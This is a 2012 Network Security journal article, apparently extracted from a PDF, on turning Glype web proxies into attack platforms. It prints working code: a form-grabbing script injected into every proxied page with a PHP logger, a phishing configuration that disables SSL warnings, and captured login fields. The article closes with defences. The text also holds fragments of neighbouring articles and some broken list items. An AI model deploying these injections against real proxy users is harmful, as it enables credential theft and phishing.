Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Abusing Glype Proxies - Attacks, Exploits and Defences
1. FEATURE
8
Network Security December 2012
Organisations also need to educate
their end users, as security is everyone’s
concern. Many data leaks caused by
insiders are due to careless, not malicious
users. Ensure that employees understand
security policies and take the proper
security precautions.
About the Author
Bill Morrow is executive chairman
and CEO at Quarri Technologies. He
has more than 20 years of business
foundation and leadership experience.
In 2006, he founded CSIdentity
Corporation, a wholesale provider of ID
theft services across the globe, and served
as CEO and chairman of the board into
2011. Previously he founded and served
as vice-chairman of the board, director
and CEO of Grande Communications.
Morrow was the 2010 Ernst & Young
Entrepreneur of the Year Award winner
for Central Texas.
References
1. Camp, Cameron. ‘The BYOD security
challenge: How scary is the iPad, tablet,
smartphone surge?’ ESET Threat Blog,
28 Feb 2012. Accessed Nov 2012.
http://blog.eset.com/2012/02/28/
sizing-up-the-byod-security-challenge.
2. Wilson, Jeff. ‘Enterprises rate
mobile device security vendors,
reveal BYOD concerns’. Infonetics.
8 Mar 2012. Accessed Nov 2012.
www.infonetics.com/pr/2012/
Enterprise-Mobile-Security-
Strategies-Survey-Highlights.asp.
3. ‘2011 Internet Security Threat
Report’. Symantec, April 2012.
Accessed Nov 2012. www.symantec.
com/threatreport.
4. ‘Mobile Device Vulnerability
Management Flagged as Top
Concern for Security Professionals
in 2012’. Tenable Network Security,
2 Apr 2012. Accessed Nov 2012.
www.tenable.com/news-events/
press-releases/2012-mobile-device-
vulnerability-management-flagged-as-
top-concern-for-se.
5. ‘2012 Confidential Documents at
Risk Study’. Ponemon Institute, 26
Jul 2012. Accessed Nov 2012. http://
info.watchdox.com/Ponemon.html.
6. ‘Survey finds nearly half of
consumers fail to upgrade software
regularly and one quarter of
consumers don’t know why to
update software’. Skype, Norton
by Symantec and Tom Tom, 23 Jul
2012. Accessed Nov 2012. http://
about.skype.com/press/2012/07/
Abusing Glype proxies: attacks,
exploits and defences
Glype is an open source proxy written in
PHP and is freely available for personal
use. It can also be licensed for commercial
use, and is available as an add-on for
Firefox as Proxilla.2 The basic idea of a
web proxy is to download requested web
pages, modify them according to a set of
proxy rules, and then forward them to the
user. By standing between the user and
the rest of the web, the proxy can provide
some anonymity to the user in addition
to other services.
Proxies can also be transformed into
attack platforms for exploitation. For
example, misconfigured proxies can
be exploited by an attacker to steal
sensitive information from users. Our
study focuses on various attacks and
the distribution of malware using
Glype proxies. We present a model
of the approach used by attackers to
transform a Glype proxy into an attack
toolkit for spreading infections. For
our experiments, we have used Glype
versions 1.1 and 1.4. We will present
details about the features of Glype
proxies that help attackers, and we will
conclude by proposing countermeasures.
Background
A number of studies have been conducted
in the past regarding the use of public
proxies as attack platforms. SANS,
a co-operative research and security
institution, conducted two studies on
the integrity of public proxies. The first,
by Powers, discussed the possibility of
malware in public proxy lists.3 The study
focused on tracking the Koobface malware
that used open ports for incoming
connections and hid operations behind
proxies through proxy lists. The other,
by Brozycki, presented techniques for
detecting proxies that provide anonymous
access and proposed methods to defend
against them using blacklisting and active
monitoring.4 A number of IDS rules
were proposed by Brozycki to prevent
users from accessing blocked content
inside a network. In this paper, we do
not cover network-level anonymisers
such as VPNs and TOR. The concept
of this paper revolves around web-based
anonymity using server-side web proxies.
The primary difference between the TOR
network and web-based proxies is that
TOR implements multi-tier (multi-layer)
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs,
and Richard J Enbody, Michigan State University
Proxies play a critical privacy role because these are widely used for anonymous
surfing and identity cloaking on the Internet. In addition, proxies also assist
in traffic filtering, traffic management, log auditing, access policies and surfing
restricted sites. There are several types of proxies available, but the Glype HTTP
proxy is used extensively.1
2. FEATURE
December 2012 Network Security
9
anonymity before forwarding the traffic to
the destination, whereas web proxies have
a two-tier (single-server) architecture.5
In other words, the difference is in the
implementation of relays and routing the
traffic between endpoints.
Huang et al discussed cache-poisoning
attacks in transparent proxies using socket
Application Programming Interfaces
(APIs) in Java and Flash.6 In cache
poisoning attacks, transparent proxies
are exploited that are configured to
route traffic based on the HTTP ‘Host:’
parameter while caching at the same time.
An attacker poisons the Host: header in
the cache using a malicious Flash or Java
file that downloads the policy file from the
attacker’s server. Cache poisoning attacks
are quite common in network proxies. The
Swiss Security Team discussed the inability
of Glype proxies to hide the user’s identity
entirely.7 Its study showed how the
misconfiguration in Glype proxies can lead
to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy
is to provide the capability of anonymous
surfing. However, attackers can also
transform a Glype proxy into a malware
infection platform. To understand the
attacks, it is important to understand the
characteristics of Glype proxies.
To provide proxy services each URL
and each page’s internal links are encoded
using a simple, base-64 encoding. For
example, consider this URL:
hxxp://[Glype_proxy_url]/proxy/browse.
php?u=Oi8vc2NyaXB0bWFmaWEub3Jn
Lw%3D%3D&b=13&f=norefer
This contains the string
‘Oi8vc2NyaXB0bWFmaWEub3JnLw’.
A simple base-64 decoding of this string
results in ‘://scriptmafia.org’ which
shows that the URL decoding process
is simple. Care is needed to handle
special characters because the Glype
proxy follows the PHP-based encoding/
decoding mechanism in which special
characters present in variable names are
encoded to maintain compatibility with
registered global variables.
The Glype proxy can be extended using
plugins. For example, popular websites
such as Facebook, Twitter and Gmail have
separate plug-ins for the Glype proxy.
Web page processing is handled using
Glype’s ‘process.php’ page. For simplicity,
the Glype proxy injects JavaScript code
in web pages to avoid sending requests to
the process.php page using HTTP POST
requests. The Glype proxy uses HTTP
headers such as ‘Referrer:’ and ‘Location:’
for redirection purposes.
Google can be used to search for
misconfigured Glype proxies. By default,
Glype logs its activities with a log
folder in the /tmp directory (/tmp/log).
Knowing the location of the log allows
a malicious user to easily craft efficient
Google queries with Google dorks to
search for misconfigured proxies.
The Glype proxy has default credentials
{username=admin, password=admin}.
The password is hardcoded as an MD5
hash, but is susceptible to brute force
attack. For secure configurations, the
hash should be replaced. In addition,
in its default configuration, the Glype
proxy uses no cache. Listing 1 shows the
implementation of the cache module in
Glype proxy. However, it is still possible
to configure Glype proxy to send some
cache headers using session_cache_
limiter(‘private_no_expire’).
Glype proxies suffer from several
design flaws that are exploited by
attackers. Some of the issues that make
Glype proxies an effective hacker tool
are discussed below.
Logging mechanism
By design, the Glype proxy is supposed
to provide anonymity for its users.
Unfortunately, weaknesses exist that can
leak information about a user’s identity.
Since Glype is written in PHP, an attacker
can perform several modifications to
make the Glype proxy a tool for successful
execution of attacks. There are different
kinds of information that attackers
can easily steal by misconfiguring the
parameters of the Glype proxy and writing
an advanced plugin for capturing data.
Listing 2 shows the type of information
logged when the user surfs a website
through a Glype proxy. It basically captures
GET requests and provides information
about IP addresses visited.
Glype proxies also allow attackers to
extract cookies – a potentially valuable
Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
header( ‘Cache-Control: no-store, no-cache, must-revalidate’ );
header( ‘Cache-Control: post-check=0, pre-check=0’, false );
header( ‘Pragma: no-cache’ );
}
Listing 2: Logs in Glype Proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.
facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.
com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
3. FEATURE
10
Network Security December 2012
source of personal information. The
Glype proxy only provides an option for
deleting cookies on the client side, not
on the server side. To provide anonymity
the cookies should be deleted completely
on both sides, but this cannot happen.
Listing 3 shows the extracted cookies of a
user who visited Facebook.
In an attempt to provide anonymity, a
Glype proxy does not log POST requests.
However, an attacker can write a plugin
to grab all POST requests. We developed
such a plugin, which we demonstrate in
the next section.
IP banning and restriction
Glype proxies provide impressive
functionality to restrict IP addresses
using the BlockScript web software.8 It
was designed to enable administrators to
restrict HTTP requests from unwanted
domains. However, this functionality is
also useful for launching targeted attacks
in which attackers target a specific set of
IP addresses and restrict others. Also, this
property can subvert the generic analysis
method of testing servers remotely. A
Glype proxy uses an IP banning module
as shown in listing 4.
In the code in listing 4, a Glype proxy
looks for IP addresses that are restricted
or blacklisted to start the verification
check. If an IP address is found in the
databases, the Glype proxy returns a
‘403 Forbidden’ response to the user.
To make it more malicious, attackers
can serve malicious web pages showing
the IP-banned message. In this way, a
user is not able to surf anonymously
and still gets infected. There are many
modifications that can be made in the
code for playing around with IP address
restrictions.
Listing 3: Cookies collected by Glype Proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.
com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522
Listing 4: IP Banning Module
if ( empty($_SESSION[‘ip_verified’]) || $_SESSION[‘ip_verified’] != $_
SERVER[‘REMOTE_ADDR’] ) {
if (!$CONFIG[‘enable_blockscript’]) {
# Current IP matches a banned IP? true/false
$banned = false;
# Examine all IP bans
foreach ( $CONFIG[‘ip_bans’] as $ip ) {
# Is this a range or single?
if ( ($pos = strspn($ip, ‘0123456789.’)) == strlen($ip)
) {
# Just a single IP so check for a match
if ( $_SERVER[‘REMOTE_ADDR’] == $ip )
{
# Flag the match and break out the
loop
$banned = true;
break; }
# And try next IP
continue;
}
// – – – – – Redacted – – – – – //
# Is the IP address banned?
if ( $banned ) {
# Send a Forbidden header
header(‘HTTP/1.1 403 Forbidden’, true, 403);
# Print the banned page and exit!
echo loadTemplate(‘banned.page’);
exit;}
# Still here? Must be OK so save IP in session to prevent rechecking
next time
$_SESSION[‘ip_verified’] = $_SERVER[‘REMOTE_ADDR’];
4. FEATURE
December 2012 Network Security
11
Threat model
Examining the threat model allows us to
understand the role of the various actors
involved and how attackers exploit
the integrity of users by conducting
attacks. The model basically covers the
threats associated with end users and
administrators. Since we’re concerned
here with the Glype proxy, the attacks
are modelled around the Man-in-the-
Middle (MitM) paradigm.
during our research,
it has been noticed that Glype proxies
are configured in a very insecure way
– for example, using default or weak
passwords. This misconfiguration
allows attackers to successfully
compromise the proxy software using
brute-force attacks. The primary risk is
that attackers now exploit third-party
resources – including infrastructure,
traffic density, etc – to exploit users
at a large scale. Glype is a server-side
proxy and compromising it has serious
implications.
the Glype proxy provides
anonymity on the web. The users
are susceptible to a wide variety of
attacks. The primary target of the
attacker is to force the users to surf
Internet resources through the Glype
proxy. The users’ surfing habits
and trust play a significant role in
the execution of insidious attacks.
Information stealing, phishing, Cross-
Frame Scripting (XFS) and so on
are some of the attacks that can be
triggered easily using Glype proxy.
Since the Glype proxy is open source,
the code can be modified using inherent
features that make it a more powerful
weapon. In the next section, we discuss
some of the attacks using custom plugins.
Remember, Glype is not a client-side
proxy but it infects and modifies the
proxied web pages served to the users.
Launching attacks using
Glype
Attacks triggered using Glype proxies
are based on the concept of the Man-
in-the-Middle (MitM) paradigm. The
MitM agent reads and writes the traffic
between two end points on the network.
It is quite easy to equate the Glype proxy
with an MitM agent because the traffic
originating from the infected machine is
routed through the Glype proxy interface
before it is processed by the web server.
The attacker controls and administers
the Glype proxy interface and can easily
manipulate the requests and responses
flowing between client’s browser and the
web server. As a result, the user is served
with illegitimate and malicious content
that subverts the normal operations of
browsers. To support this theory, our
team conducted several sets of tests to
understand the impact of Glype proxy
infection at a large scale.
Data exfiltration – form
grabbing
Data exfiltration attacks are conducted
to steal sensitive information from
infected machines on the Internet. It is
easy to exfiltrate data from users who
use Glype proxies. These proxies provide
a configuration file for managing the
current run state and it appears possible
for an attacker to infect all the proxified
web pages with illegitimate content.
To test that theory, we conducted an
experiment to understand the impact
of infecting proxied webpages. We
noticed that a Glype proxy provides
certain configuration parameters that
can be used to inject malicious content
that gets rendered in all the web pages
that are proxied. This capability can be
devastating. We implemented a small
program using jQuery to grab all the
POST requests. Listing 5 provides a
different set of scripts that we used in
our tests which are described as follows:
is used to serialise the data present
in the forms. This code serialises the
data entered by the users in input
boxes in the forms and submits the
data to the malicious domain. This
code is passed as a parameter to the
‘footer_include’ configuration, and so
injects this code at the bottom of all
the proxied webpages.
that it does not send the form data
to the server but rather triggers an
alert notification. This code is used
for validating successful insertion of
scripts in the web pages.
used to handle the incoming data and
storing it in the log file for analysis.
By using the code discussed in listing 5,
it is possible to log all the POST requests
sent by the user’s browser through the
Glype proxy’s interface. The POST data
can be logged on the server side as shown
in listing 6.
Figure 1 shows the successful
execution of a script inserted in the
proxied web page. This shows that it is
very easy to inject scripts automatically
by tweaking configuration parameters in
the Glype proxy.
Cross-frame scripting
and phishing
Cross-Frame Scripting (XFS) is an
advanced attack in which an attacker
exploits the inability of web pages to
prevent themselves from being framed
in a web browser. An attacker loads the
target website in an HTML iframe or
frame and forces the JavaScript from the
primary domain to interact with the target
website that is loaded in the frame. XFS
allows the attackers to force the legitimate
user to perform rogue operations without
their knowledge. XFS can be launched
to trigger phishing attacks. To counter
this attack many websites are using anti
XFS code.9 HTML 5 has the built-in
attribute ‘sandbox’ defined as a part of an
iframe tag that can be used to bypass the
restrictions, as described here.10 Despite
this fact, a Glype proxy has the ability to
rewrite URLs while proxying the content
of the domain. A Glype proxy caches the
URL and then applies the proxify function
to rewrite it. To make it legitimate, an
attacker can configure the Glype proxy in
such a way that phishing attacks look more
original by subverting the XFS protections.
We conducted an experiment using Glype
proxy version 1.1 and made configuration
changes in the settings.php file in order
to tweak the Glype proxy to execute a
phishing attack. We also modified the code
to execute advanced attacks to understand
the potential risk associated with a Glype
proxy. Listing 7 shows the configuration
we used in the demonstration attack code.
5. FEATURE
12
Network Security December 2012
In our code, Secure Socket Layer
(SSL) protocol warnings are turned off.
This modification allows the Glype
proxy to quash all the SSL-based
warnings. We also enabled hotlinking,
the process of directly loading content
from a third-party domain. In a Glype
proxy, hotlinking allows the attacker to
force the user to visit an XFS web page
directly. We enabled caching for faster
execution. Caching of files such as CSS,
images, and so on forces the browser
to store the content locally and use it
directly without sending requests to
the web server. This way, the attacker
can speed up the loading of web pages
in the client’s browser. Finally, we
allowed JavaScript for communication
with different objects on the web page.
JavaScript is an essential component of
many websites and applications. For
example, banking websites use JavaScript
for communicating with different objects
in a dynamic manner. In addition,
the attacker benefits from this because
it allows the attacker to execute any
arbitrary script in the context of a proxied
website. We tested this configuration and
found that it is possible to use XFS for
conducting a phishing attack as shown in
Figure 2.
Our experiment showed that
sophisticated XFS protections can be
circumvented with the help of a Glype
proxy. In Figure 2, a legitimate Bank of
America website is framed inside a Glype
proxy interface without any warnings.
It means an attacker can inject scripts as
discussed earlier to interact with various
objects on the web page. Typically, the
user believes that he/she is surfing the
bank website through a legitimate proxy
but in reality all the information can be
easily captured from the user’s session.
“It is possible to embed a single
exploit code directly in the Glype
proxy web page. This process
actually transforms the Glype
proxy into an attack toolkit”
In the above layout, the URL points
to the domain where the Glype proxy
is hosted. As hotlinking is allowed and
the Glype proxy does not present any
message, the attacker can also use the
Glype proxy URL (pointed to bank
domain) and embed it in the phishing
emails for distributing among large
number of users. When a user clicks
the malicious link, he/she is redirected
towards the Glype proxy interface that
automatically loads the legitimate bank
website. An attacker can also install a
Listing 5: Injecting Code in Glype Proxy Parameter
// – – – – Code (1) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
var yup = $(’form’).serialize();
$.post(“logit.php”, yup,function (data){});
});
</script>‘;
// – – – – Code (2) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
alert( $(’form’).serialize());
});
</script>‘;
// – – – – Code (3) – – – – //
<?php
$file = fopen(“postlog.txt”, ‘a’);
foreach( $_POST as $key => $value )
{
fwrite($file, $key.”:”.$value.”n”);
}
fclose($file);
?>
Listing 6: Extracted Data from HTTP POST (FORM
Submit) Request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
6. FEATURE
December 2012 Network Security
13
Glype proxy on familiar-looking domain
names to make the phishing attack look
more appealing, and hence more effective.
Malware distribution
Glype proxies can be used for attacking
corporate networks to spread infections.
Considering the characteristics of a
Glype proxy, it is possible for attackers
to create an embedded toolkit using a
Glype proxy for distributing malware
that is highly targeted. The complete
model is presented below.
Hosting Glype proxy: to begin, the
attacker hosts the Glype proxy tool on
a compromised domain. As described
earlier, web searching can reveal a number
of misconfigured Glype proxies on the
Internet. It is not difficult for an attacker
to hack a misconfigured proxy and use it
for malicious purposes. Once a proxy is
successfully installed on the compromised
domain, the attacker configures it for
the attack using scenarios described in
earlier sections. There are two primary
configuration checks that an attacker
wants to implement:
attacker to keep track of the activity
happening through the proxy. For
example, an attacker can install
a custom POST logger plugin for
stealing data in HTTP POST requests.
allows the attacker to restrict certain
IP addresses from accessing the Glype
proxy. This functionality is useful in
targeted infections.
Embedding a browser exploit pack
in Glype: after successful installation of
a Glype proxy, the next step is to embed
an iframe having a URL pointing to a
Browser Exploit Pack (BEP).11 The iframe
can be hidden or obfuscated depending on
the requirements. A BEP is a framework
that has a number of exploits bundled
together. A BEP begins by fingerprinting
the user’s browser environment and then
serves an appropriate exploit. BlackHole,
Phoenix and Crimepack are some of
the BEPs that are frequently used for
infections. It is possible to embed a single
exploit code directly in the Glype proxy
web page. This process actually transforms
the Glype proxy into an attack toolkit. As
discussed earlier, malicious code can be
injected dynamically in all the proxied web
pages for stealthy infections. The main
motive behind this process is to exploit the
user’s browser when a proxied web page
is opened. Additionally, many proxy users
Figure 1: Stealing credentials by injecting code in a Glype proxy.
Listing 7: Configuration Parameters Required for
Bypassing XFS and Executing Phishing
// Configure SSL warnings
$CONFIG[‘ssl_warning’] = false;
// Managing Hotlinking
$CONFIG[‘stop_hotlinking’] = false;
// Specifying the target domain for hot linking
$CONFIG[‘hotlink_domains’] = array(‘www.bankofamerica.com’);
// Storing cookies on the server
$CONFIG[‘cookies_on_server’] = true;
// Setting cookies path
$CONFIG[‘cookies_folder’] = $CONFIG[‘tmp_dir’] . ‘cookies/’;
// Enable logging
$CONFIG[‘enable_logging’] = true;
Figure 2: Phished web page in a Glype proxy.
7. FEATURE
14
Network Security December 2012
believe that surfing online anonymously
provides security and neglect to verify the
integrity of the Glype proxy. An attacker
can exploit this trust. Embedding a
malicious link pointing to a BEP is not a
hard task in the Glype proxy.
Advertising Glype proxy: once the
Glype proxy-based attack is set up, the
next step is to start advertising the Glype
proxy. Advertising is usually done to
collect revenue based on hits, but in this
case the prime motivation for an attacker
is to get traffic so that the infectious
code can be distributed. However,
advertising can play a critical role in
the success of attacks. Several methods
are used by attackers to advertise their
infected Glype proxies:
to advertise their infected Glype
proxy. Public proxy lists are one of
the most widely accepted methods
for advertising Glype proxies. For
example, paying a few dollars allows an
infected Glype proxy to be numbered
in the top-ten proxies, which is a good
deal from the attacker’s perspective.
This approach can increase traffic on
the infected Glype proxy. Figure 3
shows how a proxy can be advertised.
attacks to distribute the URL pointing
to their infected Glype proxy. Phishing
attacks have been effective for
exploiting users’ trust and belief in the
security of proxies.
proxy on social networks, message
boards and advertising links. Due to
their popularity and trustworthiness,
social networks have become the
preferred choice of attackers for
distributing malware. It is easy and
profitable.
On completion of this process,
attackers have successfully distributed
information about their infected Glype
proxy to a variety of outlets on the
Internet. After this, the attacker waits for
the infections to trigger.
Post-exploitation: once the infected
proxy site has been visited, there are
two vectors of attack. If a user is to be
directed to a malicious website loaded
with malware, the BEP there installs
malware on a user’s computer and the
computer is owned by the attacker.
If the Glype is being used to gather
information, the attacker starts mining
the logs to track the IP addresses
and extract personal information,
possibly including account credentials.
Information collected from Glype
proxies can also be very useful to design
other attack vectors. For example,
information specific to an individual can
be collected for a later, more effective
spear-phishing attack. This attack model
is typically part of a distributed attack
and can be very effective in spreading
infections widely.
Proactive steps
There are several steps that users can
take when dealing with Glype proxies
for anonymous surfing on the Internet:
services for surfing websites that require
critical information, such as financial
credentials, to be delivered to the server.
Users should be aware that their data
is being transferred through a public
proxy. A classic example would be
employees circumventing restrictions
put in place by an organisation they
work for – such circumvention could
open a big hole.
legitimate and authentic proxy services
on the Internet. However, it is still not
advised to use the services directly. A
user should verify the integrity of a
proxy provider to check whether it
is a legitimate service provider or a
fraudulent entity.
for internal use, it should be ensured
that the Glype proxy is configured
in a secure way. Default credentials
must be changed to stronger ones. Log
files should not be publicly accessible,
which can be achieved by configuring
the settings.php and .htaccess files on
the server.
good surfing habits on the Internet.
For example, they should always think
twice before clicking a link that is
embedded in an email. Additionally,
they should be suspicious of
attachments and verify them before
downloading.Theseoperationalhabits
depend on the security knowledge of
the user and show the importance of
user education. Organisations should
have a robust security training model
to educate users about the latest web
attack trends and appropriate secure
behaviour.
The steps discussed above can be
effective in reducing the infection rate
and preserving the integrity of users.
Conclusion
Glype proxies have been increasing
in popularity over the past few years.
Generally, Glype proxies assist in
maintaining a user’s integrity and privacy.
However, they can also be used as an
attack platform because of some inherent
design flaws. First, insecure configuration
of Glype proxies can result in the stealing
of information. Second, attackers can
extend the Glype proxy code to conduct
Figure 3: Advertising proxies on the Internet.
8. FEATURE
December 2012 Network Security
15
web-based attacks by tricking a user
to visit a malicious domain or routing
the web traffic through Glype proxies.
Finally, security greatly depends on users’
ability to make secure decisions when on
the Internet. Secure behaviour can help
thwart a number of attack scenarios. Be
vigilant and surf securely.
About the authors
Aditya K Sood is a senior security
practitioner and PhD candidate at
Michigan State University. He has
already worked in the security domain
for Armorize, COSEINC and KPMG.
He is also a founder of SecNiche Security,
an independent security research lab.
He has been an active speaker at
industry conferences such as DEFCON,
HackInTheBox, LayerOne, Source, RSA,
BruCon, ToorCon, HackerHalted, TRISC,
EuSecwest, XCON, Troopers, OWASP
AppSec, US-CERT GFIRST and many
others. He has authored several papers for
various publishers including IEEE, Elsevier,
Crosstalk, Virus Bulletin, ISACA, ISSA and
HITB.
Peter Greko is a security researcher at
SecNiche Security Labs where he deals
with cyber-security issues. Previously he
has worked in the cyber-security divisions
of Sypris and Citigroup. He has spoken at
several conferences, including HackerHalted,
AppSec DC, HOPE, Swiss CyberStorm and
local OWASP and ISSA chapter meetings.
Richard J Enbody, PhD is associate
professor in the Department of Computer
Science and Engineering at Michigan
State University (US) where he joined the
faculty in 1987. He earned his PhD at
the University of Minnesota (1987) and
his BA at Carleton College (1976). His
research interests include computer security,
computer architecture, web-based distance
education, and CS1 education. Enbody
has written a CS1 text using Python: ‘The
Practice of Computing Using Python,
Second Edition’, published by Addison-
Wesley 2012.
References
1. Glype proxy. Accessed Nov 2012.
www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla
Firefox Add-On. Accessed Nov 2012.
https://addons.mozilla.org/en-US/
firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with
Public Proxy Lists’. SANS Reading
Room. Accessed Nov 2012. www.
sans.org/reading_room/whitepapers/
malicious/tracking-malware-public-
proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and
Preventing Anonymous Proxy Usage’.
SANS Reading Room. Accessed Nov
2012. www.sans.org/reading_room/
whitepapers/detection/detecting-
preventing-anonymous-proxy-
usage_32943.
5. ‘TOR (The Onion Router)’.
University of Michigan. Accessed Nov
2012. http://webapps.lsa.umich.edu/
lsait/admin/TOR%20Routing%20
Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A;
Rescorla, E; Jackson, C. ‘Talking to
Yourself for Fun and Profit’. Accessed
Nov 2012. www.w2spconf.com/2011/
papers/websocket.pdf.
7. ‘When You Think You Surf
Anonymously But You Don’t’. Swiss
Security Blog, 26 Apr 2010. Accessed
Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed
Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D;
Jackson, C. ‘Busting Frame Busting: a
Study of Clickjacking Vulnerabilities
on Popular Sites’. Stanford SecLab,
20 Jul 2010. Accessed Nov 2012.
http://seclab.stanford.edu/websec/
framebusting/framebust.pdf.
10.Sood, AK; Enbody, RJ. ‘Frametrapping
the framebusting defence’. Network
Security, October 2011. Accessed Nov
2012. www.sciencedirect.com/science/
article/pii/S1353485811701052.
11.Sood, AK; Enbody, RJ. ‘Browser
Exploit Packs – Exploitation Tactics’.
ToorCon Security Conference,
October 2011, San Diego. Accessed
Nov 2012. http://secniche.blogspot.
com/2011/06/toorcon-seattle-2011-
browser-exploit.html.
Virtual jihad: how real is
the threat?
Steve Gold
One of the less well reported aspects
of cybercrime – and one that poses
a very real threat to the integrity of
companies’ IT resources, as well as that
of Western governments – is the issue of
cyber-terrorism. According to Dancho
Danchev, an Amsterdam-based security
blogger with Webroot, and an Internet/
security researcher since the mid-1990s,
the reason for this is largely because
of a lack of understanding of what
cyber-jihadism is all about. Coupled
with a lack of understanding about the
teachings of the Koran and Islamic faith,
this has resulted in the topic becoming
something of a no-go area for Western
security researchers, despite the fact that
the more extremist elements in Islamic
countries are increasingly using relatively
advanced technology in the shape of
Steve Gold, freelance journalist
There is widespread concern about the ways in which terrorist organisations – and
particularly jihadist movements – may be using the Internet to organise and execute
acts of terror. But is the threat real, or is it a case of an IT security industry generating
fear, uncertainty and doubt in an attempt to instil fear into every Internet user?